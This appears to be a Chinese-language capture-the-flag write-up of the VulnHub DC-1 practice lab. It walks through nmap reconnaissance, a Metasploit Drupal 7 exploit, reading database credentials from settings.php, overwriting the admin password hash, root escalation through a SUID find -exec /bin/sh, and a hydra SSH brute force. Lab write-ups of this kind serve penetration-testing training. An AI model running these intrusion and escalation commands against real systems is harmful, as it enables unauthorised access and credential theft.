- 搭建环境
- 描述靶场
CD-1是一个专门建造的易受攻击的实验室,在获得渗透测试领域的经验。它被设计成对初学者的一个挑战,但是它有多简单取决于你的技能和知识,以及你的学习能力。要成功完成这个挑战,你需要Linux技能、熟悉Linux命令行和基本渗透测试工具的经验,比如可以在Kali Linux或Parrot Security OS上找到的工具。有多种获得根的方法,但是我已经包括了一些标志,其中包含初学者的线索。总共有五个标志,最终目标是找到并读取root用户主目录中的标志。也可以不成为root用户就可以做到这一点,但需要root权限。初学者可能会遇到他们以前从未遇到的挑战,但是Google搜索应该是完成这个挑战所需要的全部信息。总之是一共有五个flag,最终目标是找到root用户主目录中的flag。
2.下载地址
https://www.vulnhub.com/entry/dc-1,292/
3.已知我们的目标是找到root用户主目录中的flag。然后把我们所需的应用程序打开,要注意的是网络设置,要与攻击机kali在同一网段,要么就是都用NAT模式。
- 渗透靶场
- 进入kali后,输入sudo su进入root权限
2.信息收集寻找靶机真实IP //nmap -sP192.168.35.1/24
扫描网段中有哪些主机在线,使用-sP参数,不扫描端口,只扫描存活主机。本质上是Ping扫描,能Ping通有回包,就判定主机在线。
3.信息收集探测端口和服务//nmap -A -p- -v 192.168.35.129
发现开放了22端口,开放ssh服务,OpenSSH 6.0p1
发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7
发现开放了111端口,开放rpcdind服务
4.访问web站点192.168.35.129
发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS
·利用MSF渗透
典型的drupal,启动Metersploit MSF存在drupal模块,尝试使用msf渗透
- MSF简单命令介绍
msfconsole 进入MSF控制台
search 搜索相应模块
use 对应模块
show options 查看信息
set RHOST 远程主机ip
run 攻击
2.搜索Drupal 7的漏洞
搜索发现可利用的漏洞很多// searchsploit drupal 7
3.利用msf渗透先进入MSF控制台//msfconsole
4.搜索drupal模块//search drupal
5.选择模块进行测试,设置靶机IP运行MSF run攻击
6.先进入shell再执行whoami
7.发现是www-data权限
进入home目录,发现flag4.txt文件,提示需要提升权限
8.使用python反弹一个交互式shell //python -c "import pty;pty.spawn('/bin/bash')"
9.查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件 //cd /var/www
10、查看文件内容
cat /var/www/sites/default/settings.php
发现了flag2和数据库的账号密码
flag2提示,提升权限为root来查看敏感文件,或者直接爆破
先进入数据库查看
mysql -u dbuser -p
查看数据库,切换到drupldb数据库
show databases;/use drupaldb
11.查看查找默认的Drupal user 表//select * from users;
发现admin信息
12、置换drupal密码
进入WWW目录//quit;
站点路径下执行//php scripts/password-hash.sh 新密码111
然后在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库
mysql -u dbuser -p
R0ck3t
use drupaldb
将pass字段进行替换
update users set pass="$S$DW/j0Hhhx6pIBV4ZkoBp3mv/5l8reTwEBdpgzB/x8awTYUfFkd2k" where name="admin";
13.登录站点
访问站点192.168.35.129
进行登录,密码是之前我们自己替换的111,账号是admin
成功登录
14.发现flag3
登陆战点之后,翻一番,发现flag3
点击flag3进入,发现提示信息
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.//使用命令查看suid权限的可执行二进制程序
find / -perm -4000 2>/dev/null
15.使用命令测试,发现为root权限
touch 123
ls
find / -name 123 -exec "whoami" \;
16.发现最后的flag文件
我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。
find /var/www/misc -exec "/bin/sh" \;
whoami
ls
cd /root
ls
查看cat thefinalflag.txt文件
翻译大致就是说已经通关了
17、发现flag4
我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破
cat /etc/passwd
先Ctrl+z退出
进入john目录cd /usr/share/john
hydra -l flag4 -P password.lst ssh://192.168.35.129
完成啦!